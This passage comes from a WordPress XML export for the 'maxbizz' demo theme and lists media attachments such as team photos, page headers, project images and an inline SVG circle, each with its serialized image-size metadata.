		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:959;s:6:"height";i:650;s:4:"file";s:23:"2020/09/image1-team.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:23:"image1-team-300x203.jpg";s:5:"width";i:300;s:6:"height";i:203;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"image1-team-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"image1-team-768x521.jpg";s:5:"width";i:768;s:6:"height";i:521;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"image1-team-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"image1-team-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:23:"image1-team-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"image1-team-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-single-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-team/single-team/image1-single-team/</link>
		<pubDate>Thu, 10 Sep 2020 03:28:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>713</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 03:28:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 03:28:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-single-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>711</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-single-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:530;s:6:"height";i:500;s:4:"file";s:30:"2020/09/image1-single-team.jpg";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:30:"image1-single-team-300x283.jpg";s:5:"width";i:300;s:6:"height";i:283;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"image1-single-team-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"image1-single-team-530x400.jpg";s:5:"width";i:530;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-blog</title>
		<link>http://wpdemo.archiwp.com/maxbizz/blog/pheader-blog/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-blog.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>770</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-blog]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>768</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-blog.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-blog.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/09/pheader-blog.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-blog-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-blog-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-blog-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-blog-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-blog-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-blog-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-blog-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-project</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/pheader-project/</link>
		<pubDate>Thu, 10 Sep 2020 10:20:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-project.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>774</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 10:20:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 10:20:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-project]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-project.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-project.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:27:"2020/09/pheader-project.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:26:"pheader-project-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"pheader-project-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"pheader-project-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"pheader-project-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:28:"pheader-project-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-project-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-project-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/project-slide-1/</link>
		<pubDate>Thu, 10 Sep 2020 10:41:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>778</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 10:41:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 10:41:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:27:"2020/09/project-slide-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"project-slide-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"project-slide-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"project-slide-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-details</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/project-details/</link>
		<pubDate>Fri, 11 Sep 2020 03:07:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-details.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>780</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 03:07:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 03:07:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-details]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-details.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-details.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1174;s:6:"height";i:620;s:4:"file";s:27:"2020/09/project-details.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:27:"project-details-300x158.jpg";s:5:"width";i:300;s:6:"height";i:158;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"project-details-1024x541.jpg";s:5:"width";i:1024;s:6:"height";i:541;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"project-details-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"project-details-768x406.jpg";s:5:"width";i:768;s:6:"height";i:406;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"project-details-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"project-details-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>black-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/black-circle/</link>
		<pubDate>Fri, 11 Sep 2020 03:20:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/black-circle.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>782</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 03:20:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 03:20:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[black-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/black-circle.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/black-circle.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart-project</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/chart-project/</link>
		<pubDate>Fri, 11 Sep 2020 03:38:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart-project.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>784</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 03:38:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 03:38:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart-project]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart-project.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart-project.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:606;s:6:"height";i:342;s:4:"file";s:25:"2020/09/chart-project.png";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:25:"chart-project-300x169.png";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"chart-project-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"chart-project-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"chart-project-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:25:"chart-project-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"chart-project-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-10</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/retirement-plan/project-10/</link>
		<pubDate>Fri, 11 Sep 2020 04:32:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-10.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>800</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:32:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:32:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-10]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>797</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-10.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-10.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:695;s:4:"file";s:22:"2020/09/project-10.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:22:"project-10-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"project-10-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"project-10-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"project-10-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-12</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/business-planning/project-12/</link>
		<pubDate>Fri, 11 Sep 2020 04:38:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-12.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>803</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:38:30]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:38:30]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-12]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>802</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-12.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-12.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:22:"2020/09/project-12.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:22:"project-12-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"project-12-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"project-12-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"project-12-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-11</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/money-market/project-11/</link>
		<pubDate>Fri, 11 Sep 2020 04:41:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-11.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>807</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:41:09]]></wp:post_date>
